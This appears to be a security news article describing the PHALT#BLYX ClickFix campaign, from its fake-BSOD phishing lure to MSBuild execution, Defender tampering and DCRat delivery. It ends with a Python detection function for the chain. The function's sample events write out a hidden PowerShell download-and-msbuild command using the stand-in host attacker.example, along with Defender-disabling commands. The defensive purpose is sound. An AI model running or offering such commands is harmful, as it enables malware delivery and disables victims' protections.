New ClickFix Attack Deploys Fake Windows BSOD Screens to Deceive Users into Running Malicious Code

A new phishing campaign dubbed PHALT#BLYX has surfaced, targeting hotels and hospitality businesses across Europe during the holiday season.

The attackers use an advanced “ClickFix” social engineering tactic that displays a fake Windows Blue Screen of Death (BSOD) to trick users into executing malicious PowerShell commands, ultimately delivering the remote access trojan DCRat.

A Multi-Stage “Living off the Land” Chain

The attack begins with phishing emails that pose as Booking.com reservation cancellation alerts, often citing inflated charges in euros to create urgency.

Victims who click the “See details” button are redirected via oncameraworkout[.]com/ksbo to the spoofed site low-house[.]com, a near-perfect clone of Booking.com.

The fake site displays a “page loading” error and a Refresh button that triggers the next stage. Once clicked, the page simulates a BSOD and prompts users to “fix” the issue by pressing Windows + R, then pasting the automatically copied script into the Run dialog.

This trick coerces users into manually executing a PowerShell command, bypassing built‑in security controls.

The hidden PowerShell command downloads an MSBuild project file (v.proj) from 2fa-bns[.]com and executes it via MSBuild.exe, a trusted Microsoft utility. This “Living‑off‑the‑Land” (LotL) technique helps the malware evade antivirus detection by blending with legitimate system activity.

Disabling Defenses and Deploying DCRat

Once executed, v.proj adds multiple exclusions to Windows Defender, including .exe, .ps1, and .proj files, then attempts privilege escalation.

If administrative rights are granted, it disables real‑time protection and downloads the payload staxs.exe via the BITS service. The malware then establishes persistence using an unusual method: it creates a URL shortcut (.url file) in the Startup folder so that it runs after every reboot.

The final payload DCRat (a Russian‑origin Remote Access Trojan) is injected into aspnet_compiler.exe to evade detection.

It uses strong AES‑256 encryption and PBKDF2 for configuration protection and connects to multiple C2 servers, including asj77[.]com, asj88[.]com, and asj99[.]com, over port 3535.

Once connected, it collects extensive system data, maintains live communication, and supports tasks such as keylogging, remote shell access, screen capture, and payload delivery, including coin miners.

Researchers at Securonix identified Cyrillic debug strings and structural similarities to AsyncRAT, linking the campaign to Russian‑speaking developers.

The evolution from earlier HTA‑based infections to MSBuild‑driven execution marks a shift toward stealthier, more persistent operations.

Experts advise organizations to monitor PowerShell and MSBuild activities, detect suspicious .proj or .url files, and reinforce staff awareness about ClickFix‑style phishing lures.
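The monitoring advice above, as an added example that is not from the article or from Securonix: a small Python triage function run over constructed Sysmon-style events (process, file and network records with assumed field names and a placeholder download host) that flags each stage of the chain the article describes, from the pasted PowerShell one-liner through MSBuild, Defender tampering, the Startup .url shortcut and the aspnet_compiler.exe host talking on port 3535.

```python
import re

# Constructed sample telemetry in a Sysmon-like shape; not real logs from the campaign.
SAMPLE_EVENTS = [
    {"type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -w hidden -c iwr hxxp://attacker.example/v.proj -OutFile $env:TEMP\v.proj; msbuild $env:TEMP\v.proj"},
    {"type": "process", "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "cmdline": r"msbuild C:\Users\guest\AppData\Local\Temp\v.proj"},
    {"type": "process", "parent": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell Add-MpPreference -ExclusionExtension exe,ps1,proj; Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"type": "file", "path": r"C:\Users\guest\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.url"},
    {"type": "network", "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe", "dst_port": 3535},
    {"type": "process", "parent": r"C:\Program Files\Microsoft Visual Studio\devenv.exe",  # benign developer build
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe", "cmdline": r"msbuild C:\src\app\app.csproj"},
]

DOWNLOAD_CMDLETS = re.compile(r"iwr|invoke-webrequest|downloadstring|downloadfile|start-bitstransfer|bitsadmin", re.I)
DEFENDER_TAMPER = re.compile(r"(Add|Set)-MpPreference.*(Exclusion|DisableRealtimeMonitoring)", re.I)
USER_WRITABLE = re.compile(r"\\(Temp|AppData|Downloads|Public)\\", re.I)
STARTUP_URL = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.url$", re.I)
DCRAT_PORT = 3535  # C2 port reported for this campaign

def detect_clickfix_chain(events):
    """Return (rule, detail) pairs for events that match a stage of the PHALT#BLYX chain."""
    findings = []
    for ev in events:
        image = ev.get("image", "").lower()
        parent = ev.get("parent", "").lower()
        cmd = ev.get("cmdline", "")
        if ev["type"] == "process" and image.endswith("powershell.exe"):
            # Stage 1: the pasted Run-dialog one-liner fetches a project file and hands it to MSBuild
            if "msbuild" in cmd.lower() and DOWNLOAD_CMDLETS.search(cmd):
                findings.append(("powershell_download_to_msbuild", cmd))
            # Stage 3: v.proj adds Defender exclusions and disables real-time protection
            if DEFENDER_TAMPER.search(cmd):
                findings.append(("defender_tampering", cmd))
        elif ev["type"] == "process" and image.endswith("msbuild.exe"):
            # Stage 2: MSBuild building a .proj spawned by PowerShell or from a user-writable path
            if re.search(r"\.proj\b", cmd, re.I) and (parent.endswith("powershell.exe") or USER_WRITABLE.search(cmd)):
                findings.append(("msbuild_proj_lotl", cmd))
        elif ev["type"] == "file" and STARTUP_URL.search(ev["path"]):
            # Stage 4: persistence via a .url shortcut dropped into a Startup folder
            findings.append(("startup_url_persistence", ev["path"]))
        elif ev["type"] == "network" and image.endswith("aspnet_compiler.exe") and ev.get("dst_port") == DCRAT_PORT:
            # Stage 5: the injection host process talking to C2 on the reported port
            findings.append(("aspnet_compiler_c2_port", image))
    return findings
```

The benign devenv.exe build in the sample shows why the MSBuild rule keys on the parent process and on user-writable paths rather than on MSBuild.exe alone.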


The post New ClickFix Attack Deploys Fake Windows BSOD Screens to Deceive Users into Running Malicious Code appeared first on Cyber Security News.
